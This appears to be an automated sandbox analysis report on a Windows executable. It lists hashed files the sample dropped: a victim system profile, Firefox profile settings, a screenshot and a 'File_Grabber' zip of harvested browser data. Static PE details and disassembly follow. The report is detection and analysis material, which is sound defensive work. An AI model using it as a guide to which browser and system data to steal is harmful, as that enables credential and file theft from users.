                  Preview:eyJhcHAtc2V0dXAuanMiOiJQbjRNZDJISEVHT2EyOUV3Ym43RzJHT0FPWU1jdDVLQnc4aGU2TjNBSG00PSIsImNyeXB0by5idW5kbGUuanMiOiJYNjU2R29UZ0dKVko5VVZZMVFWaW9rVGIrOW9Oako4TGtlaU1MRGFZL3FNPSIsImxvYWQtaHViLWkxOG4uYnVuZGxlLmpzIjoidUpZUHBpanhuaVJBVGs3NmJWdzltWmYzUGFQWldtNnAzc0hxczAwRWY0WT0iLCJtYW5pZmVzdC53ZWJhcHAuanNvbiI6IkJ3ZHV5NkNsdUsvR09icUJvNjRkOEpTcTFPOEZXTzlVeUdieTF0cktRRTA9IiwicnVudGltZS5idW5kbGUuanMiOiJTUEVFL3ExcWxRaHQ1TG44bEs5YzIzdG9CQ1FyNTNtandKY2VuejFkOHFZPSIsInZlbmRvci5idW5kbGUuanMiOiJJVHNycXcwK1hsK0NNUGMyL0QvbnFER21vWjk2WVl0bC9ta29kR0Z4aXNNPSIsIndhbGxldC1jcnlwdG8uaHRtbCI6ImpLYlVHa2ZzZkVmWkpEYyt0N1lTdGE0QnpycE00cFIwSjlsOGVndzBYTGs9Iiwid2FsbGV0LWljb24uc3ZnIjoiVVlpSy9zR1dWSUpPakVvQ2srWkRHZUxXMzFsRURUemlDSGU2d3RaQVRaQT0iLCJ3YWxsZXQuYnVuZGxlLmpzIjoiVlo3RnhzNVIvZHVEMXJNMGdPUi9hay80VDJ4QXgxbHh5RkwrREVkV1hXOD0iLCJ3YWxsZXQuaHRtbCI6Ik1uTG9oU08vcTVzMkVuWGEzdFhSK0FrRHhycUFUdWQwaXZYN1lydHYwTFE9In0=.e2mRaJdMQuCKD+0Cwj5huurciWFUB/NShsVDvZajZxaIedT58EsvbiD8lZcA6fn1Y2oG2vgt3D+OaaeXPlT7sw
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:5l:7
                  MD5:2DD3F3C33E7100EC0D4DBBCA9774B044
                  SHA1:B254D47F2B9769F13B033CAE2B0571D68D42E5EB
                  SHA-256:5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
                  SHA-512:C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:A/lll:A/
                  MD5:635E15CB045FF4CF0E6A31C827225767
                  SHA1:F1EAAA628678441481309261FABC9D155C0DD6CB
                  SHA-256:67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
                  SHA-512:81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:lX:1
                  MD5:2D84AD5CFDF57BD4E3656BCFD9A864EA
                  SHA1:B7B82E72891E16D837A54F94960F9B3C83DC5552
                  SHA-256:D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
                  SHA-512:0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:Wtl:WX
                  MD5:D192F7C343602D02E3E020807707006E
                  SHA1:82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
                  SHA-256:BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
                  SHA-512:AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:s:s
                  MD5:2A8875D2AF46255DB8324AAD9687D0B7
                  SHA1:7A066FA7B69FB5450C26A1718B79AD27A9021CA9
                  SHA-256:54097CCCAE0CFCE5608466BA5A5CA2A3DFEAC536964EEC532540F3B837F5A7C7
                  SHA-512:2C39F05A4DFFD30800BB7FBB3FF2018CF4CC96398460B7492F05CE6AFD59079FD6E3EB7C4F8384A35A954A22B4934C162A38534AD76CFB2FD772BCF10E211F7C
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:a/l/:e/
                  MD5:F732BF1006B6529CFFBA2B9F50C4B07F
                  SHA1:D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
                  SHA-256:77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
                  SHA-512:064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:EX:EX
                  MD5:FC94FE7BD3975E75CEFAD79F5908F7B3
                  SHA1:78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
                  SHA-256:EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
                  SHA-512:4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:6:6
                  MD5:379523B9F5D5B954E719B664846DBF8F
                  SHA1:930823EC80B85EDD22BAF555CAD21CDF48F066AA
                  SHA-256:3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
                  SHA-512:ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:V/l/:/
                  MD5:5F243BF7CC0A348B6D31460A91173E71
                  SHA1:5696B34625F027EC01765FC2BE49EFCFD882BF8E
                  SHA-256:1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
                  SHA-512:9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:J:J
                  MD5:DB7C049E5E4E336D76D5A744C28C54C8
                  SHA1:A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
                  SHA-256:E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
                  SHA-512:B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):295
                  Entropy (8bit):4.7070549789727645
                  Encrypted:false
                  SSDEEP:6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
                  MD5:9FADCDA30B07120E2CB70B5A003ACFF9
                  SHA1:A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
                  SHA-256:63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
                  SHA-512:E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
                  Malicious:false
                  Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../** @license React v16.14.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):295
                  Entropy (8bit):4.7070549789727645
                  Encrypted:false
                  SSDEEP:6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
                  MD5:9FADCDA30B07120E2CB70B5A003ACFF9
                  SHA1:A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
                  SHA-256:63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
                  SHA-512:E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
                  Malicious:false
                  Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../** @license React v16.14.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):520
                  Entropy (8bit):5.354445655339239
                  Encrypted:false
                  SSDEEP:12:T4Lwvf1YudhJfBQ682LDcGuyXkvsUvE+LK5H4ll:T4Lwvf1ZDf6zHVG2D
                  MD5:1FF5A4CB501B8C02AF9A0543E20815E7
                  SHA1:EA922F09E197350B3B63FBD2C818221E8CC46D9C
                  SHA-256:3A79D28C79B02A38BA65D34D936C82CCA74A5C690E383A29C94EC9A27A3190CE
                  SHA-512:4942A867AB0B21BD19A2D296FA7F08C595C22E2717E8039E7A18FF9EADA60E6DFB455E28FC525A303A5BB5E72608B27AC8F77EE2C52A454EB3493E5D60F0F395
                  Malicious:false
                  Preview:library=..name=NSS Internal PKCS #11 Module..parameters=configdir='sql:C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\2o7hffxt.default-release' certPrefix='' keyPrefix='' secmod='secmod.db' flags=optimizeSpace updatedir='' updateCertPrefix='' updateKeyPrefix='' updateid='' updateTokenDescription='' ..NSS=Flags=internal,critical trustOrder=75 cipherOrder=100 slotParams=(1={slotFlags=[ECC,RSA,DSA,DH,RC2,RC4,DES,RANDOM,SHA1,MD5,MD2,SSL,TLS,AES,Camellia,SEED,SHA256,SHA512] askpw=any timeout=30})....
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):280
                  Entropy (8bit):4.105637406271287
                  Encrypted:false
                  SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHglt:o1cUh4Y3LbO/BVsJDbYuDRBOyc/
                  MD5:DC41CF25F0BDDA3ABA274B6BC64147DC
                  SHA1:9F4D1379C944E6FC2FB912B89527193E1E1F4177
                  SHA-256:8A190FE3DDBCF216F41A690A55DF92576D410F050818FFB476125A4EC6CF52ED
                  SHA-512:91481621424973E0B4340ADE1B84402B24FE9F705A63D7044DD0B7BBC416E27F22684F4AB39EC4C7C8A13829A07BBA8B9B1576E820D23424804C0DE837F0FB17
                  Malicious:false
                  Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):20
                  Entropy (8bit):3.6219280948873624
                  Encrypted:false
                  SSDEEP:3:8g6Vvn:8g6Vv
                  MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                  SHA1:E68E02453CE22736169A56FDB59043D33668368F
                  SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                  SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                  Malicious:false
                  Preview:level=none expiry=0.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:5l:7
                  MD5:2DD3F3C33E7100EC0D4DBBCA9774B044
                  SHA1:B254D47F2B9769F13B033CAE2B0571D68D42E5EB
                  SHA-256:5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
                  SHA-512:C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:A/lll:A/
                  MD5:635E15CB045FF4CF0E6A31C827225767
                  SHA1:F1EAAA628678441481309261FABC9D155C0DD6CB
                  SHA-256:67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
                  SHA-512:81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:lX:1
                  MD5:2D84AD5CFDF57BD4E3656BCFD9A864EA
                  SHA1:B7B82E72891E16D837A54F94960F9B3C83DC5552
                  SHA-256:D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
                  SHA-512:0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:Wtl:WX
                  MD5:D192F7C343602D02E3E020807707006E
                  SHA1:82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
                  SHA-256:BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
                  SHA-512:AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:a/l/:e/
                  MD5:F732BF1006B6529CFFBA2B9F50C4B07F
                  SHA1:D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
                  SHA-256:77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
                  SHA-512:064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:EX:EX
                  MD5:FC94FE7BD3975E75CEFAD79F5908F7B3
                  SHA1:78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
                  SHA-256:EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
                  SHA-512:4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:6:6
                  MD5:379523B9F5D5B954E719B664846DBF8F
                  SHA1:930823EC80B85EDD22BAF555CAD21CDF48F066AA
                  SHA-256:3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
                  SHA-512:ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:V/l/:/
                  MD5:5F243BF7CC0A348B6D31460A91173E71
                  SHA1:5696B34625F027EC01765FC2BE49EFCFD882BF8E
                  SHA-256:1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
                  SHA-512:9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24
                  Entropy (8bit):1.6368421881310118
                  Encrypted:false
                  SSDEEP:3:J:J
                  MD5:DB7C049E5E4E336D76D5A744C28C54C8
                  SHA1:A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
                  SHA-256:E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
                  SHA-512:B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
                  Malicious:false
                  Preview:CMMM ...................
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                  Category:dropped
                  Size (bytes):86364
                  Entropy (8bit):7.853958352430728
                  Encrypted:false
                  SSDEEP:1536:CGcIgeNZAuI3qbL7YQTCEjV3Frl7U14kY9i9LEk6qC4+H+bRYqwNbOye91:XcIgcxbbLFXjV1re14kVo2bmsy61
                  MD5:E4DD7EF96A76F9B1510979B317109423
                  SHA1:A074F3D8F53C97F2E3D2F2F93B560124CC46FE7B
                  SHA-256:11D542A806F7FF04CAAE783353269D69CECC508D4961D41B1D0B49EAE6E7E17F
                  SHA-512:25AFA1835F614841F65DD1B83E752F889BB1E9E20FC605E2570C33EA82ADF6A9CC53CF66278CF0AACD695E07DE433A71CCF3DC6F949DEED582248E982E8C0297
                  Malicious:false
                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):353
                  Entropy (8bit):5.335570770643404
                  Encrypted:false
                  SSDEEP:6:muemWElnXFbRNLQqwBEoNN2RmU9mVW2yUiQPMVWK/lAAAB6nglCGyA2l5:demW8nXFFNLQqwBEoP2d9YW210VWKNA6
                  MD5:F537D7FC77C78DACC8356BDA2198E4FE
                  SHA1:655A59923574DD7C0C1AD8D3392306015179BFD3
                  SHA-256:56657BCBA98EB60B1666075544688D8241930F4950CDC0034E71A2C8A5B6C309
                  SHA-512:2BA15EEC91063EBAE860CAD2BED3DFEC9AD53C2005E65C365EFFFD75421F8D78F08F45ABB0B45B813313B6CAB90B374FE188C1667660651595A14DBA2B9E2E4C
                  Malicious:false
                  Preview:User Name: user..Computer Name: 226533..HWID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..Windows Version: 6.2..Install Path: C:\Users\user\Desktop\CwQQqCmqkY.exe..Processor Architecture: 9..Page Size: 4096..Number of Processors: 4..Processor Type: 8664..RAM Size: 8191 MB..Screen Resolution: 1280 x 1024..System Language: en..BIOS Version: P......
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                  Category:dropped
                  Size (bytes):88529
                  Entropy (8bit):7.9541701634816215
                  Encrypted:false
                  SSDEEP:1536:KV+Ev7ivzCkkNejXTmA9eZHDJ4EWFl2F/Ma4CobRHQAqJ8HDgcso2:KRvOvzCHSp9CHtvPAqJ8jnsR
                  MD5:FB4CBB5AC04728326AEC378ABB37D52D
                  SHA1:7AD5267DD508BACC37EEC598CD60209BEB089D72
                  SHA-256:4261128318796DE0C724A0B46562A5ECC976F671884B381381B078607DEED2E0
                  SHA-512:ABBC79B3F5A4B6FB722E8A1F42DFD0254CA2533960D5C6D73E45F5337A5E86F91276636E2A59A89C8FE9CEBDC85E020012D0CED53BA00AA70A70C25CC79225C9
                  Malicious:false
                  Preview:PK.......... ....j........-...\File_Grabber\0.1.filtertrie.intermediate.txt3.4....PK.......... ....h........-...\File_Grabber\0.2.filtertrie.intermediate.txt3.4....PK.......... .>M..........!...\File_Grabber\1-7FeatureCache.txt]R[..!..@.."....$.m...GB.j[m6o._oW.qN.6.;<V......+...H.3.=...l.U#v..../....i.Y<=2...BM.;.t",2.......Q.[i..LmF....K..K%..w.. WaR.!..fbp.}.rtV6.NisV.;'.:...Y.3gu..sJ...."....G.....!:g.......][..:{..C...j.....A>....7{y..i....U85....Q..Zetn0}.7.h|.PK.......... .F8P.X.......#...\File_Grabber\AlternateServices.txt..].. ....0b....&BX.~h+(:|u..qf.Y.Y1o*V..>...3...~..=..d..c....bD.bt-35...r.....GU7PK.......... .................\File_Grabber\eventbeacons.dat..PK.......... .0.............\File_Grabber\hub-signature.txte...6.E?.V%..M3....`[...h&$..6e...>Nw%U....}...5,.....N...eT.q^a$Na...'..F.YY......x7N.J..%..NBj......-...E.==.|.K..:.._n.*jb...3..6cB\..%w....;...;..FR.'.......x.>+/.^"....M....z......^v.$Yx`p.P.r.5#o..B/..Q...(..._.g..P
                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                  Entropy (8bit):6.481015768352334
                  TrID:
                  • Win64 Executable GUI (202006/5) 92.65%
                  • Win64 Executable (generic) (12005/4) 5.51%
                  • Generic Win/DOS Executable (2004/3) 0.92%
                  • DOS Executable Generic (2002/1) 0.92%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:CwQQqCmqkY.exe
                  File size:1'014'784 bytes
                  MD5:1a477a5659d817b01a50f2a80cb1d76e
                  SHA1:48a07f82c03c9a1b7b3c21caf356f1c67775e359
                  SHA256:1940ba18ed66dd2f1c3d4dbd2fbf6cf3438bcdee1e108982fb557461106a8073
                  SHA512:1689881e40ed47c7e2676da05b82a518220fb7b2626c1365f4855fd5040432029e4f01d6113a8060dcf9657df31a9dfae238fa0adc6fc8a59e2891f971e645fa
                  SSDEEP:24576:B7p+HXMi+1rY+HTXxkteD+e8tzNwH72X0P8tIZlZx1a3x/UBJ7tGaF:91VHTBKed8tzNwH72X002Zl43WB9g+
                  TLSH:F7259E5A67A401F9D5B7C178C9638207E7B2B455173097DF02E48B662F236E2AF3E720
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J47.+Zd.+Zd.+Zd.SYe.+Zd.S_ek+Zde..d.+Zde.Ye.+Zde.^e.+Zde._e.+Zd.S^e.+Zd..^e.+Zd.].d.+Zd.+[d.*Zd.S[e.+Zd..Se.+Zd..Ze.+Zd..Xe.+Z
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x14007a2a8
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x140000000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x676B1A15 [Tue Dec 24 20:31:17 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:5a11a1daae79316451acc3c23c77d259
                  Instruction
                  dec eax
                  sub esp, 28h
                  call 00007F23A1252504h
                  dec eax
                  add esp, 28h
                  jmp 00007F23A1251C2Fh
                  int3
                  int3
                  jmp 00007F23A12528C0h
                  int3
                  int3
                  int3
                  inc eax
                  push ebx
                  dec eax
                  sub esp, 20h
                  dec eax
                  mov ebx, ecx
                  jmp 00007F23A1251DC1h
                  dec eax
                  mov ecx, ebx
                  call 00007F23A126D7B2h
                  test eax, eax
                  je 00007F23A1251DC5h
                  dec eax
                  mov ecx, ebx
                  call 00007F23A125A8CAh
                  dec eax
                  test eax, eax
                  je 00007F23A1251D99h
                  dec eax
                  add esp, 20h
                  pop ebx
                  ret
                  dec eax
                  cmp ebx, FFFFFFFFh
                  je 00007F23A1251DB8h
                  call 00007F23A12528B0h
                  int3
                  call 00007F23A11E1236h
                  int3
                  dec eax
                  sub esp, 28h
                  call 00007F23A1252B8Ch
                  test eax, eax
                  je 00007F23A1251DD3h
                  dec eax
                  mov eax, dword ptr [00000030h]
                  dec eax
                  mov ecx, dword ptr [eax+08h]
                  jmp 00007F23A1251DB7h
                  dec eax
                  cmp ecx, eax
                  je 00007F23A1251DC6h
                  xor eax, eax
                  dec eax
                  cmpxchg dword ptr [0007429Ch], ecx
                  jne 00007F23A1251DA0h
                  xor al, al
                  dec eax
                  add esp, 28h
                  ret
                  mov al, 01h
                  jmp 00007F23A1251DA9h
                  int3
                  int3
                  int3
                  dec eax
                  sub esp, 28h
                  test ecx, ecx
                  jne 00007F23A1251DB9h
                  mov byte ptr [00074285h], 00000001h
                  call 00007F23A1252879h
                  call 00007F23A1256B90h
                  test al, al
                  jne 00007F23A1251DB6h
                  xor al, al
                  jmp 00007F23A1251DC6h
                  call 00007F23A126DCD7h
                  test al, al
                  jne 00007F23A1251DBBh
                  xor ecx, ecx
                  call 00007F23A1256BA0h
                  jmp 00007F23A1251D9Ch
                  Programming Language:
                  • [ C ] VS2010 build 30319
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0xe9c100x58.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe9c680xf0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf10000x9624.pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xfb0000x14b8.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0xdbf200x38.rdata
